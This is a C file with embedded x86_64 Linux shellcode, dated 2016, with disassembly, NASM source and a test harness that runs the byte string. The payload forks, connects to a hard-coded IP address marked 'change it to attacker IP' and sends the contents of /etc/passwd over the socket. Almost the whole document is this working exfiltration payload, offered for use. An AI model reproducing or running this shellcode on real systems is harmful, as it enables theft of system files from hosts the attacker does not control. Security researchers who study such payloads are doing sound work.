/*
# Title : Linux x86_64 /etc/passwd file sender shellcode
# Date : 28-06-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
*/
/*
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor %rax,%rax
400083: b0 39 mov $0x39,%al
400085: 0f 05 syscall
400087: 99 cltd
400088: 48 39 d0 cmp %rdx,%rax
40008b: 74 07 je 400094 <send>
40008d: 48 31 c0 xor %rax,%rax
400090: b0 3c mov $0x3c,%al
400092: 0f 05 syscall
0000000000400094 <send>:
400094: b2 06 mov $0x6,%dl
400096: 48 31 f6 xor %rsi,%rsi
400099: 48 ff c6 inc %rsi
40009c: 40 b7 02 mov $0x2,%dil
40009f: 48 31 c0 xor %rax,%rax
4000a2: b0 29 mov $0x29,%al
4000a4: 0f 05 syscall
4000a6: 4d 31 c0 xor %r8,%r8
4000a9: 49 89 c0 mov %rax,%r8
4000ac: 48 31 c0 xor %rax,%rax
4000af: 99 cltd
4000b0: 48 31 ff xor %rdi,%rdi
4000b3: 48 31 f6 xor %rsi,%rsi
4000b6: 50 push %rax
4000b7: 50 push %rax
4000b8: 50 push %rax
4000b9: c6 04 24 02 movb $0x2,(%rsp)
4000bd: 66 c7 44 24 02 05 c0 movw $0xc005,0x2(%rsp)
4000c4: c7 44 24 04 c0 a8 56 movl $0x8056a8c0,0x4(%rsp)
4000cb: 80
4000cc: 48 89 e6 mov %rsp,%rsi
4000cf: b2 10 mov $0x10,%dl
4000d1: 4c 89 c7 mov %r8,%rdi
00000000004000d4 <connect>:
4000d4: 48 31 c0 xor %rax,%rax
4000d7: b0 2a mov $0x2a,%al
4000d9: 0f 05 syscall
4000db: 4d 31 c9 xor %r9,%r9
4000de: 4c 39 c8 cmp %r9,%rax
4000e1: 75 f1 jne 4000d4 <connect>
4000e3: 48 31 c0 xor %rax,%rax
4000e6: 48 31 f6 xor %rsi,%rsi
4000e9: 50 push %rax
4000ea: 50 push %rax
4000eb: 50 push %rax
4000ec: c7 04 24 2f 65 74 63 movl $0x6374652f,(%rsp)
4000f3: c7 44 24 04 2f 2f 70 movl $0x61702f2f,0x4(%rsp)
4000fa: 61
4000fb: c7 44 24 08 73 73 77 movl $0x64777373,0x8(%rsp)
400102: 64
400103: 48 89 e7 mov %rsp,%rdi
400106: b0 02 mov $0x2,%al
400108: 0f 05 syscall
40010a: 48 89 c6 mov %rax,%rsi
40010d: 4c 89 c7 mov %r8,%rdi
400110: 99 cltd
400111: 66 41 ba 88 13 mov $0x1388,%r10w
400116: 48 31 c0 xor %rax,%rax
400119: b0 28 mov $0x28,%al
40011b: 0f 05 syscall
40011d: 48 31 c0 xor %rax,%rax
400120: b0 3c mov $0x3c,%al
400122: 0f 05 syscall
*/
/*
section .text
global _start
_start:
xor rax,rax
mov al,57
syscall
cdq
cmp rax,rdx
jz send
xor rax,rax
mov al,60
syscall
send:
;----------------
;connecting to server
;-------------------------
;creating socket
mov dl,6
xor rsi,rsi
inc rsi
mov dil,2
xor rax,rax
mov al,41
syscall
;---------------------
xor r8,r8
mov r8,rax ;socket descriptor
;----------------------------
;connecting.............
;struct sockaddr_in 16 bytes
;sin_family 2 bytes
;sin_port 2 bytes
;sin_addr 4 bytes
xor rax,rax
cdq
xor rdi,rdi
xor rsi,rsi
push rax
push rax
push rax
mov [rsp],byte 2
mov [rsp+2],word 0xc005 ;port 1472 (change it if U want)
mov [rsp+4],dword 0x8056a8c0 ;change it to attacker IP
mov rsi,rsp
mov dl,16
mov rdi,r8
connect:
xor rax,rax
mov al,42
syscall
xor r9,r9
cmp rax,r9
jnz connect
;------------------------------
;opennig /etc/passwd
xor rax,rax
xor rsi,rsi
push rax
push rax
push rax
mov [rsp],dword '/etc'
mov [rsp+4],dword '//pa'
mov [rsp+8],dword 'sswd'
mov rdi,rsp
mov al,2
syscall
;----------------------
;sending...............
mov rsi,rax ;in_fd
mov rdi,r8 ;out_fd
cdq
mov r10w,5000
xor rax,rax
mov al,40
syscall
;--------------
;exiting
xor rax,rax
mov al,60
syscall
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x48\x31\xc0\xb0\x39\x0f\x05\x99\x48\x39\xd0\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\xb2\x06\x48\x31\xf6\x48\xff\xc6\x40\xb7\x02\x48\x31\xc0\xb0\x29\x0f\x05\x4d\x31\xc0\x49\x89\xc0\x48\x31\xc0\x99\x48\x31\xff\x48\x31\xf6\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xc0\xc7\x44\x24\x04\xc0\xa8\x56\x80\x48\x89\xe6\xb2\x10\x4c\x89\xc7\x48\x31\xc0\xb0\x2a\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x75\xf1\x48\x31\xc0\x48\x31\xf6\x50\x50\x50\xc7\x04\x24\x2f\x65\x74\x63\xc7\x44\x24\x04\x2f\x2f\x70\x61\xc7\x44\x24\x08\x73\x73\x77\x64\x48\x89\xe7\xb0\x02\x0f\x05\x48\x89\xc6\x4c\x89\xc7\x99\x66\x41\xba\x88\x13\x48\x31\xc0\xb0\x28\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
